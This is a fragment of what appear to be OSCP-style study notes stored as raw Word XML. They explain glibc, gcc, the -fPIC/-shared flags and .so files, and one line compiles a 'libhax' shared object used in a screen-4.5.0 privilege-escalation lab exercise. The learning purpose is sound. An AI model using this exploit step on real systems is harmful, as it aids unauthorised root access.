      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is glibc, and how does it relate to gcc?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003601">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">glibc (GNU C Library) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the standard C runtime library on Linux. It’s the implementation of all the C standard functions (printf, malloc, strcpy, fork, execve, socket, …). It’s also the layer that wraps system calls (glibc calls into the kernel).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003602">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="642"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc (GNU Compiler Collection) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is just the compiler/driver. It translates your .c file into machine code and then links your program. When gcc links, it pulls in glibc (unless you tell it not to).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003603">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003604">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relationship:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003605">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You write code that calls printf.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc compiles it, but printf isn’t in your code — it’s in glibc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So gcc arranges for your binary to depend on glibc at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003608">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you say -static, gcc bundles glibc inside your executable; if you don’t, gcc leaves an instruction that says “find glibc at runtime as a shared library”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of gcc as the cook and glibc as the ingredient library of standard recipes that every dish uses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of gcc as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cook</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and glibc as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ingredient library</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of standard recipes that every dish uses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u9m3q2ptsoeg" w:id="485"/>
      <w:bookmarkEnd w:id="485"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fPIC and -shared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000360F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We first saw this flag used when creating .so files the screen-4.5.0 priv esc for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-A .143 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003610">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003611">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ran these two:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003612">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="949"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003613">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003614">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fPIC</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -shared</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are both seen very often together, and are used for making .so files out of the .c file. And -ldl is also often included too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003615">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003616">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. -shared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003617">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instructs the linker: “don’t make an executable with main(), make a shared object instead.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003618">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output is .so (ELF type ET_DYN) instead of an ELF executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003619">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without -shared, gcc tries to link an executable and will complain about “undefined reference to main” if you don’t provide one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So: mandatory for .so builds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. -fPIC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="765"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tells the compiler: “generate position-independent code.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="765"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared libs can be mapped at different addresses in different processes. PIC makes this safe: the code has no absolute addresses baked in, so the dynamic loader can relocate it easily.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000361F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="765"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On x86-64 Linux, PIC is essentially required for shared libs. Some non-PIC code can still be linked into a shared object, but it may cause text relocations (less efficient, sometimes blocked by hardened kernels).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003620">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="765"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So: best practice (and in practice, required) for .so builds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003621">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003622">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(and add -ldl if you call dlopen/dlsym).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003623">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pozsmkr7k4bt" w:id="486"/>
      <w:bookmarkEnd w:id="486"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so files</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003624">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003625">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">files?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003626">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files are like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .dll</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files but for Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003627">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the case of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">glibc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it contains the dependencies of C executables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003628">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003629">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For glibc, the key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .so file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000362A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
